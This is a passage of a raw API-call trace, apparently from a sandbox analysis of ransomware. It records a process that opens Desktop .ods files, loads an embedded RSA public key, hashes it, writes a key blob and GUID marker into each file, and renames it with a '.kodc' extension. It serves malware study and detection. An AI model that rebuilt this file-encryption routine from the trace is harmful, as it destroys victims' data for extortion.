cAlternateFileName="JKJDLN~1.ODS")) returned 1 [0097.782] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkjdLnetgwIJnbnmh.ods") returned=".ods" [0097.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkjdLnetgwIJnbnmh.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jkjdlnetgwijnbnmh.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.782] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=23395) returned 1 [0097.782] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.785] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5b3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.786] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.787] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.787] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.787] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x5b63, lpOverlapped=0x0) returned 1 [0097.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.787] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.787] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.787] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.788] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.788] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.788] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.788] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.788] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.788] GetLastError () returned 0x0 [0097.788] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.788] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.788] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.789] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.789] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.789] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5b60) returned 0x9ba4d90 [0097.789] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340020 [0097.789] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6b8 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340068 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6d0 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a700 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a718 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.790] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a700 | out: hHeap=0x630000) returned 1 [0097.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a718 | out: hHeap=0x630000) returned 1 [0097.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a718 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a700 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a718 | out: hHeap=0x630000) returned 1 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a700 | out: hHeap=0x630000) returned 1 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.791] GetCurrentThreadId () returned 0x42c [0097.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696218 [0097.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.791] GetCurrentThreadId () returned 0x42c [0097.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a700 [0097.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0097.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a718 [0097.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a6e8 [0097.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a730 [0097.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0097.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0097.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a700 | out: hHeap=0x630000) returned 1 [0097.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a700 [0097.794] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5b63, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.794] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.795] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.795] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.795] CloseHandle (hObject=0x5cc) returned 1 [0097.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.805] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkjdLnetgwIJnbnmh.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jkjdlnetgwijnbnmh.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkjdLnetgwIJnbnmh.ods.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jkjdlnetgwijnbnmh.ods.kodc")) returned 1 [0097.806] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd03d7d0, ftCreationTime.dwHighDateTime=0x1d5bd42, ftLastAccessTime.dwLowDateTime=0xb36cc4a0, ftLastAccessTime.dwHighDateTime=0x1d5b980, ftLastWriteTime.dwLowDateTime=0xb36cc4a0, ftLastWriteTime.dwHighDateTime=0x1d5b980, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KMPcG-yOQU21BwvLjWXX", cAlternateFileName="KMPCG-~1")) returned 1 [0097.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2d28 [0097.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.807] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53a0610, ftCreationTime.dwHighDateTime=0x1d5bb86, ftLastAccessTime.dwLowDateTime=0x43998df0, ftLastAccessTime.dwHighDateTime=0x1d5ba04, ftLastWriteTime.dwLowDateTime=0x43998df0, ftLastWriteTime.dwHighDateTime=0x1d5ba04, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NcPu25RMbC", cAlternateFileName="NCPU25~1")) returned 1 [0097.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0097.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0097.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x32b2de0 [0097.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce068 [0097.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce750 [0097.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce410 [0097.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.807] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb33e8c50, ftCreationTime.dwHighDateTime=0x1d5b699, ftLastAccessTime.dwLowDateTime=0xc939f200, ftLastAccessTime.dwHighDateTime=0x1d5c239, ftLastWriteTime.dwLowDateTime=0xc939f200, ftLastWriteTime.dwHighDateTime=0x1d5c239, nFileSizeHigh=0x0, nFileSizeLow=0x15370, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ojxdX-of4_PQAXSnC.ods", cAlternateFileName="OJXDX-~1.ODS")) returned 1 [0097.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0097.807] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ojxdX-of4_PQAXSnC.ods") returned=".ods" [0097.807] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ojxdX-of4_PQAXSnC.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ojxdx-of4_pqaxsnc.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.807] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=86896) returned 1 [0097.807] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.810] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1534a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.810] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.811] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x15370, lpOverlapped=0x0) returned 1 [0097.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.812] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.812] lstrlenA (lpString="-----BEGIN PUBLIC 